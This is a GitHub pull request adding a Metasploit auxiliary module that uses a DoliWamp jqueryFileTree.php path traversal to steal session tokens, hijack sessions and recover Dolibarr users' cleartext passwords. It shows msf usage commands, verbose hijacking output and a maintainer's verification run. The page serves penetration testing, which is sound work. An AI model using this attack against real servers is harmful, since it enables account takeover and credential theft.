Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module #2940

Merged
merged 1 commit into from Feb 10, 2014

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Feb 3, 2014

Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module.

Steals session tokens, attempts to hijack each session and gathers the user's username and password in clear text.

traversal

Example Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[+] 192.168.237.138:80 - Found credentials (admin:admin)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed

Example Verbose Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[*] 192.168.237.138:80 - Trying to hijack a session -   1.56% done (1/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   3.12% done (2/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   4.69% done (3/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   6.25% done (4/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   7.81% done (5/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   9.38% done (6/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  10.94% done (7/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  12.50% done (8/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  14.06% done (9/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  15.62% done (10/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  17.19% done (11/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  18.75% done (12/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  20.31% done (13/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  21.88% done (14/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  23.44% done (15/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  25.00% done (16/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  26.56% done (17/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  28.12% done (18/64 tokens)
[+] 192.168.237.138:80 - Hijacked session for user with ID '1'
[*] 192.168.237.138:80 - Retrieving user's credentials
[+] 192.168.237.138:80 - Found credentials (admin:admin)
[*] 192.168.237.138:80 - Trying to hijack a session -  29.69% done (19/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  31.25% done (20/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  32.81% done (21/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  34.38% done (22/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  35.94% done (23/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  37.50% done (24/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  39.06% done (25/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  40.62% done (26/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  42.19% done (27/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  43.75% done (28/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  45.31% done (29/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  46.88% done (30/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  48.44% done (31/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  50.00% done (32/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  51.56% done (33/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  53.12% done (34/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  54.69% done (35/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  56.25% done (36/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  57.81% done (37/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  59.38% done (38/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  60.94% done (39/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  62.50% done (40/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  64.06% done (41/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  65.62% done (42/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  67.19% done (43/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  68.75% done (44/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  70.31% done (45/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  71.88% done (46/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  73.44% done (47/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  75.00% done (48/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  76.56% done (49/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  78.12% done (50/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  79.69% done (51/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  81.25% done (52/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  82.81% done (53/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  84.38% done (54/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  85.94% done (55/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  87.50% done (56/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  89.06% done (57/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  90.62% done (58/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  92.19% done (59/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  93.75% done (60/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  95.31% done (61/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  96.88% done (62/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  98.44% done (63/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 100.00% done (64/64 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed

vprint_good("#{peer} - Hijacked session for user with ID '#{user_id}'")
return user_id
else
# print_debug("#{peer} - Could not hijack session. Session is invalid.")
Copy link
Contributor

@wchen-r7 wchen-r7 Feb 3, 2014

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Did you mean to leave this commented out? Looks like useful info for debugging purposes.

@wchen-r7 wchen-r7 self-assigned this Feb 10, 2014
@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Feb 10, 2014

Processing.

@wchen-r7 wchen-r7 merged commit 9b9b2fa into rapid7:master Feb 10, 2014
1 check passed
@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Feb 10, 2014

Verification:

msf auxiliary(doliwamp_traversal_creds) > run

[*] 10.*.***.***:8181 - Finding session tokens...
[+] 10.*.***.***:8181 - Found 8 session tokens
[*] 10.*.***.***:8181 - Trying to hijack a session...
[*] 10.*.***.***:8181 - Trying to hijack a session -  12.50% done (1/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  25.00% done (2/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  37.50% done (3/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  50.00% done (4/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  62.50% done (5/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  75.00% done (6/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  87.50% done (7/8 tokens)
[+] 10.*.***.***:8181 - Hijacked session for user with ID '1'
[*] 10.*.***.***:8181 - Retrieving user's credentials
[+] 10.*.***.***:8181 - Found credentials (admin:********)
[*] 10.*.***.***:8181 - Trying to hijack a session - 100.00% done (8/8 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     ********  Yes   

@bcoles bcoles deleted the doliwamp_traversal_creds branch Apr 6, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants